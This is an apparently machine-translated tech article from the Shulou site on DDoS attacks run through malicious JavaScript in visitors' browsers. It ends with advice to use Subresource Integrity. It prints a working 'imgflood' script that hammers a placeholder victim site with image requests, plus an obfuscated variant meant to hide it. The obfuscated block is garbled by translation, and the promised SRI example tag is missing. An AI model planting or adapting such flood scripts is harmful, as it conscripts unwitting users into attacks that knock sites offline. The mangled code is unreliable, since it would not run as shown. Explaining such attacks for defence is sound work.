In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article introduces what the DDOS attack based on JavaScript is like, the content is very detailed, interested friends can refer to, hope to be helpful to you.
The oldest, most common, but most frightening attack is the DDoS attack.
In traditional DDoS attacks, attackers control a large number of puppet machines and then send a large number of requests to the target server to prevent legitimate users from accessing the site.
However, in recent years, DDoS attack technology has been constantly emerging: attackers deceive users to participate in the attack in a new and interesting way: using malicious JavaScript to deceive users to participate in DDoS attacks.
JavaScript-based DDOS attacks have an unusual feature: any device with a browser may participate in the attack, and its potential attack scale is close to infinite.
Principle of DDOS attack based on JavaScript
Most of the interactions of modern websites are based on JavaScript. JavaScript scripts can be injected directly into HTML or loaded from a remote server through HTML.
Function imgflood () {var TARGET =''victim-website.com'var URI =' / index.php?'var pic = new Image () var rand = Math.floor (Math.random () * 1000) pic.src = 'http://'+TARGET+URI+rand+'=val'}setInterval(imgflood, 10)
The script generates an image button on the target page that points to the "'victim-website.com" website. As long as a user visits a page containing the script, he becomes a member of the "' victim-website.com" DDoS attack. Every request made by the browser is a valid request, so the attack becomes a Layer 7 attack.
Because it is JS code, by looking at the source code of the web page, you can directly see the attack code and find that it is the attack web page. However, if the above code is confused by JShaman, the JS code will be protected and more difficult to identify and discover:
Var _ 0x9ea1 = ['victim\\ x2dwebsite\\ x2ecommtra'\ x2findex\\ x2ephp\\ x3f'] (_ 0xa439d7 ['\ x3a\\ x2f\\ x2f']; (function (_ 0xa439d7) 0x7a3f17) {var _ 0x2fcd4b=function (--_ 0x1be501) {_ 0xa439d7 ['\ x70\\ x75\ x73\ x68'] (_ 0xa439d7 ['\ x73\ x68\ x69\ x66\ x74') (); _ 0x2fcd4b (+ _ 0x7a3f17);} (_ 0x9ea1pr 0xa1)); var _ 0x19ea=function (_ 0x3ac308 retro 0x2c1ecf) {_ 0x3ac308=_0x3ac308-0x010,var _ 0x393163examples _ 0x9ea1 [_ 0x3ac308]; return _ 0x393163;}; function imgflood () {var _ 0xcb2cd4=_0x19ea ('0x0'); var _ 0x3d1bbb=_0x19ea (' 0x1'); var _ 0x189885=new Image (); var _ 0x2dfc3a=Math [_ 0x19ea ('0x2')] (Math [_ 0x19ea (' 0x3')] () * 0x3e8) _ 0x189885 [_ 0x19ea ('0x4')] = _ 0x19ea (' 0x5') + _ 0xcb2cd4+_0x3d1bbb+_0x2dfc3a+_0x19ea ('0x6');} setInterval (imgflood,0xa)
If an attacker invades a website and embeds a malicious JavaScript script similar to the above in the site's js file, then every visitor to the site will become a member of the DDoS attack. The higher the traffic to the website, the more serious the DDoS.
How to prevent this kind of attack?
At present, HTTP does not have a mechanism to prevent the script from running, but the W3C has proposed a new feature called Sub-Resource Integrity (SRI), which uses encrypted hash values to verify scripts, and browsers can prevent them from running if the hash values do not match.
For example, the following script tag:
The browser will automatically download the .js file and run it indiscriminately. Even if a malicious script is injected into the file by an attacker, the browser will not recognize it (nor will it). However, if the site finds that the hash value validation script does not match, the child resource integrity (SRI) tells the browser not to run the script.
It is recommended that webmasters add this tag to the server to protect their users from being exploited.
So much for the sharing of JavaScript-based DDOS attacks. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 285
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.